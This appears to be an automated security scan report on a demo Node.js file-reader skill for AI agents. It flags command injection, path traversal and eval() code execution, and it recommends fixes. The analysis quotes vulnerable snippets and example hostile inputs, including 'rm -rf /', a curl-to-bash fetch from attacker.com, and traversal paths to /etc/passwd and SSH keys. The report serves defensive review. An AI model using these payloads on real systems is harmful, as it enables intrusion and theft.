
File Reader Skill

Scanned on 2/7/2026


This skill contains multiple critical vulnerabilities including command injection, path traversal, and arbitrary code execution that could lead to complete system compromise.

Trust Score: 5/100
Risk Level: critical
Issues Found: 4

Security Analysis

This skill receives a trust score of 5/100 (CRITICAL RISK - DO NOT INSTALL). The code demonstrates three of the most severe security vulnerabilities: command injection, path traversal, and arbitrary code execution via eval(). The readUserFile function allows attackers to execute arbitrary shell commands by injecting malicious input (e.g., 'file.txt; rm -rf /' or 'file.txt && curl attacker.com | bash'). The readFile function permits reading any file on the system through path traversal attacks (e.g., '../../../etc/passwd' or '../../../home/user/.ssh/id_rsa'), potentially exposing sensitive credentials, configuration files, and private keys. The processUserCode function with eval() is extremely dangerous, allowing complete application takeover by executing arbitrary JavaScript code with full application privileges. An attacker could use this to steal environment variables, access databases, exfiltrate data, or establish persistence. The automated security findings correctly identified these critical issues. There are no security controls, input validation, or sanitization present. This code appears to be either a deliberately vulnerable example or an extremely negligent implementation. Installing this skill would create immediate and severe security risks, including data theft, credential compromise, and complete system takeover.

Security Findings

critical - code-execution

Command injection vulnerability in readUserFile function allows arbitrary command execution through unsanitized user input passed directly to exec()

Evidence:

exec(`cat ${userInput}`, (error, stdout) => {...})
Recommendation: Never pass user input directly to exec(). Use execFile() with an array of arguments, or better yet, use fs.readFile() instead of shell commands. Implement strict input validation and sanitization.

critical - code-execution

Arbitrary code execution via eval() function with user-controlled input allows attackers to execute any JavaScript code in the application context

Evidence:

function processUserCode(code) { eval(code); }
Recommendation: Remove eval() entirely. If dynamic code execution is required, use a sandboxed environment like vm2 or isolated-vm with strict security policies. Consider alternative approaches like configuration-based logic.

critical - filesystem

Path traversal vulnerability in readFile function allows reading arbitrary files on the system through directory traversal sequences

Evidence:

fs.readFileSync(`/data/$(unknown)`, 'utf8') with no sanitization allows ../../../etc/passwd
Recommendation: Validate and sanitize filename input. Use path.normalize() and path.join(), then verify the resolved path is within the allowed directory. Implement a whitelist of allowed filenames or use path.resolve() with validation.

high - code-execution

Use of child_process.exec is inherently dangerous as it spawns a shell, making command injection easier compared to execFile or spawn

Evidence:

const { exec } = require('child_process');
Recommendation: Replace exec() with execFile() or spawn() which don't invoke a shell. For file reading operations, use native Node.js fs module methods instead.

Source Information

ClawHub Page: clawhub.com/skills/file-reader-skill
Source URL: ../demo-skills/file-reader-skill.js
Code Size: 809 characters
Semgrep Findings: 3